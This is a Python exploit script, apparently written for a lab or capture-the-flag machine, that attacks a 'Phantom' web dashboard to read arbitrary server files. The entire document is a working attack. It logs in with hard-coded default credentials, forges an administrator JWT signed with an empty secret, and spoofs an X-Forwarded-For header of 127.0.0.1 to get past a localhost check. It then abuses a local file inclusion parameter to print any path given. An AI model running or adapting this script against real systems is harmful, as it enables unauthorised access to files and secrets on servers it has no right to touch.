#!/usr/bin/env python3 import argparse import html import re import sys import time import jwt import requests IP = "192.168.1.112" HOST = "token.dsz" ADMIN_USER = "admin" ADMIN_PASS = "admin123" def forge_token(): return jwt.encode( {"user": ADMIN_USER, "role": "administrator", "iat": int(time.time())}, "", algorithm="HS256", ) def extract_file_content(body): marker = "文件内容:
" start = body.find(marker) if start == -1: return None start += len(marker) end = body.find("", start) if end == -1: return None return html.unescape(body[start:end]).strip() def extract_error(body): match = re.search(r"错误:\s*([^<]+)", body) if match: return html.unescape(match.group(1)).strip() denied = re.search(r'

([^<]+)

', body) if denied: return html.unescape(denied.group(1)).strip() return None def main(): parser = argparse.ArgumentParser(description="Read files through Phantom dashboard LFI") parser.add_argument("paths", nargs="+", help="absolute paths to read") args = parser.parse_args() session = requests.Session() headers = {"Host": HOST} login = session.post( f"http://{IP}/index.php", headers=headers, data={"user": ADMIN_USER, "pass": ADMIN_PASS, "login": ""}, allow_redirects=False, timeout=8, ) if login.status_code != 302: print(f"[-] Login did not redirect: HTTP {login.status_code}", file=sys.stderr) return 1 for cookie in list(session.cookies): if cookie.name == "auth_token": session.cookies.clear(cookie.domain, cookie.path, cookie.name) session.cookies.set("auth_token", forge_token(), path="/") read_headers = {"Host": HOST, "X-Forwarded-For": "127.0.0.1"} failed = 0 for path in args.paths: resp = session.post( f"http://{IP}/dashboard.php", headers=read_headers, data={"file_path": path}, timeout=8, ) content = extract_file_content(resp.text) print(f"===== {path} =====") if content is None: failed += 1 error = extract_error(resp.text) if error: print(f"[-] {error}") else: print(f"[-] Could not extract content, HTTP {resp.status_code}, {len(resp.text)} bytes") continue print(content) return 1 if failed == len(args.paths) else 0 if __name__ == "__main__": raise SystemExit(main())